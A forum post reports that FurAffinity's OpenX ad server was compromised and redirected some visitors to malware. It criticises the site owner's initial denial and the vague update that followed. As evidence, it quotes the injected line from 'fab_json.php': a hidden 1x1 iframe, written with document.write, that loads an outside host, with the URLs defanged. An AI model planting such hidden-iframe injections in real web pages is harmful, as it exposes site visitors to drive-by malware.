A couple of users on FA have discovered that FA's ad server, running
OpenX has been compromised, and contains code that redirects some browsers to malware.
http://www.furaffinity.net/journal/5828127#cid:40627895Re-Post in hope to have NON-clicky links... Preview feature would also be nifty...
It's hidden inside "fab_json.php" which starts off with a
"document.write('<iframe src="SNIPPEDHTTP:// lat . lunakid . com/bannerid?5" width="1" height="1" frameborder="0"></iframe>');var ox_data = [];"
and the "lat.lunakid.com" - whatever that is - delivers a matching html that includes "SNIPPEDHTTP:// simplyfwd . com/?pid=1POB1UHJ2.....akid.com"
So, yes, it DOES stem from FA and *some* browsers pick up on it and others don't.
This comes after Dragoneer denies that it's coming from FA, and somehow conducts an audit of his site code in a whopping 9 minutes:
That's not related to FA, nor do I see any code anywhere on the site which would lead to that. It may be malware which was picked up by the browser somewhere.
He then had to backpeddle:
Yes, it looks like you are correct after all. We're investigating it right now and seeing if we can fix it while prepping some security patches.
They have since updated the news post about bringing the ad server down for apparently unrelated issues with the following:
Update: The server maintenance is complete. We are currently looking into an issue with ad server, and will credit all advertisers 48 hours for the downtime. We expect to have the ad server up by tonight (6/8/2014) and will post updates as we have them.
Love how they've made "we may have been serving malware" into "an issue".
